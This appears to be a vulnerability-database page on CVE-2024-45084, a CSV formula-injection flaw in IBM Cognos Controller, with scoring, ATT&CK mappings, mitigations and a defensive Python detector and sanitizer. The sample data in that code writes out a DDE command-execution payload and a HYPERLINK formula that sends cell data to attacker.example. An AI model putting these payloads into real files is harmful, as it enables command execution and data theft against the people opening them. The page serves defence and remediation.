Cyber Resilience

CVE-2024-45084

Severity: High
Published: 19 February 2025
Modified: 29 September 2025
KEV Added: not listed
Patch: available (see IBM advisory below)
CVSS Score v3.1: 8.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)
EPSS Score: 0.0026 (49.6th percentile)
Risk Priority: 16 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2024-45084 is a high-severity Improper Neutralization of Formula Elements in a CSV File (CWE-1236) vulnerability in IBM Cognos Controller and IBM Controller. Its CVSS v3.1 base score is 8.0 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS ranks it at the 49.6th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2024-45084 is a formula injection vulnerability in IBM Cognos Controller versions 11.0.0 through 11.0.1 FP3 and IBM Controller 11.1.0. The flaw stems from improper validation of file contents, enabling an authenticated attacker to inject malicious formulas that lead to arbitrary command execution on the affected system. It has a CVSS v3.1 base score of 8.0 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) and is associated with CWE-1236.

An authenticated attacker with low privileges (PR:L) can exploit this vulnerability over the network (AV:N) with low attack complexity (AC:L), but a user must interact with the crafted content (UI:R): in the usual CWE-1236 pattern the injected formula is only evaluated when someone opens or processes the file in a spreadsheet or similar application, and the scope is unchanged (S:U), so the impact lands on the system that evaluates it. Successful exploitation yields high impact on confidentiality, integrity, and availability (C:H/I:H/A:H), including execution of arbitrary commands.

IBM's security advisory at https://www.ibm.com/support/pages/node/7183597 provides the fix details, including patched builds for the affected versions. Apply the updates promptly, review which authenticated users are permitted to upload or import files into these products (the vulnerability requires valid credentials), and until the patch is in place treat files exported from them as untrusted content before opening them in a spreadsheet application.

Vulnerability details

IBM Cognos Controller 11.0.0 through 11.0.1 FP3 and IBM Controller 11.1.0 could allow an authenticated attacker to conduct formula injection. An attacker could execute arbitrary commands on the system, caused by improper validation of file contents.

CWE(s)

CWE-1236 Improper Neutralization of Formula Elements in a CSV File

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1204.002 User Execution: Malicious File (Execution)
An adversary may rely upon a user opening a malicious file in order to gain execution.
Why these techniques?

Cognos Controller is a network-reachable application, so an authenticated attacker who injects formula elements into a file it processes or exports is exploiting the exposed application itself (T1190); note that valid credentials are required (PR:L), so this is not unauthenticated exploitation of a public-facing service. The injected formula only executes when a user opens or processes the crafted file (UI:R), which is the user-execution step covered by T1204.002.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2024-40702 · Same product: IBM Cognos Controller
CVE-2024-28777 · Same product: IBM Cognos Controller
CVE-2024-52902 · Same product: IBM Cognos Controller
CVE-2023-47160 · Same product: IBM Cognos Controller
CVE-2026-35157 · Shared CWE-1236
CVE-2025-55745 · Shared CWE-1236
CVE-2020-36962 · Shared CWE-1236
CVE-2024-41763 · Same product: Microsoft Windows
CVE-2024-41767 · Same product: Microsoft Windows
CVE-2026-8855 · Same product: Microsoft Windows

Affected Assets

IBM Cognos Controller: 11.0.0 through 11.0.1.4
IBM Controller: 11.1.0

Mitigating Controls (NIST 800-53 r5)

SI-10 Information Input Validation (prevent)

Directly addresses the improper validation of file contents that enables authenticated attackers to inject malicious formulas leading to arbitrary command execution.

SI-2 Flaw Remediation (prevent)

Mitigates the vulnerability by requiring timely remediation of flaws, including application of the vendor patches specified in IBM's security advisory.

Further control (prevent)

Enforces restrictions on the file types and structures the system will process, limiting opportunities for formula injection via unexpected input formats.
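The input-validation control (SI-10) above and the formula-injection mechanism described under Deeper analysis are both illustrated by the following Python example. It is added for this page and is not IBM Cognos Controller code nor taken from the IBM advisory; all function and constant names are hypothetical, the sample CSV is constructed for the demo, and the payload strings are the generic OWASP CSV-injection illustrations rather than anything observed in the product. It shows the check a practitioner runs on an imported file (which cells would be evaluated as formulas), the vulnerable export pattern beside the hardened one, and the numeric-column edge case that a naive sanitizer gets wrong.

```python
"""Formula-injection (CWE-1236) check and fix for CSV files.

Added example for this page, not IBM Cognos Controller code and not taken
from the IBM advisory. Function and constant names are hypothetical; the
sample CSV below is constructed for the demo and the payload strings are the
standard OWASP CSV-injection illustrations, not anything observed in the
product.
"""
import csv
import io
import re

# Leading characters a spreadsheet application treats as the start of a formula.
# Tab and carriage return are included because they can split a cell so that
# the next character becomes a leading '='.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# A plain signed number ("-42", "+3.5") also starts with a trigger but is harmless
# arithmetic; flagging it would make the detector noisy on numeric columns.
PLAIN_NUMBER = re.compile(r"^[+-]?\d+(\.\d+)?$")


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would evaluate this cell rather than display it."""
    if not value.startswith(FORMULA_TRIGGERS):
        return False
    return PLAIN_NUMBER.match(value) is None


def neutralize_cell(value: str) -> str:
    """OWASP CSV-injection guidance: prefix a leading single quote so the
    consuming application stores the cell as text. The quote stays visible in
    the spreadsheet; that is the accepted trade-off."""
    return "'" + value if is_formula_cell(value) else value


def find_suspicious_cells(csv_text: str) -> list:
    """SI-10 style input validation on an uploaded/imported CSV: return
    (row, column, value) for every cell that would be evaluated as a formula.
    csv.reader strips the surrounding quotes, so a quoted "=..." is caught too."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        for c, cell in enumerate(row, start=1):
            if is_formula_cell(cell):
                findings.append((r, c, cell))
    return findings


def export_rows_unsafe(rows) -> str:
    """Vulnerable export pattern: user-controlled strings written verbatim."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(rows)
    return buf.getvalue()


def export_rows_safe(rows) -> str:
    """Hardened export: neutralize every string cell before writing. Typed
    numbers are left alone so they still import as numbers; csv.writer handles
    quoting of separators and embedded double quotes."""
    cleaned = [
        [neutralize_cell(c) if isinstance(c, str) else c for c in row]
        for row in rows
    ]
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(cleaned)
    return buf.getvalue()


# Constructed sample: an import file with two injected cells (row 3 col 1 is the
# classic DDE payload, row 4 col 2 exfiltrates cell A1 through a hyperlink).
SAMPLE_IMPORT = (
    "account,owner,balance\n"
    "Cash,Alice,100\n"
    "\"=cmd|' /C calc'!A0\",Bob,200\n"
    'Payroll,"=HYPERLINK(""http://attacker.example/?""&A1,""open"")",300\n'
)


if __name__ == "__main__":
    for r, c, v in find_suspicious_cells(SAMPLE_IMPORT):
        print(f"row {r} col {c}: {v!r}")
    rows = [["account", "balance"], ["=cmd|' /C calc'!A0", -42]]
    print(export_rows_unsafe(rows))
    print(export_rows_safe(rows))
```

Run the detector on anything a user uploads or imports and reject or quarantine the file when it returns findings; apply the neutralizing exporter to untrusted string columns only, since a typed numeric value such as -42 is legitimately a leading-minus cell and must not be turned into text. The leading single quote is visible to whoever opens the file, which is the documented cost of the OWASP approach; the alternative of rejecting such cells at import is what the SI-10 control above describes.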
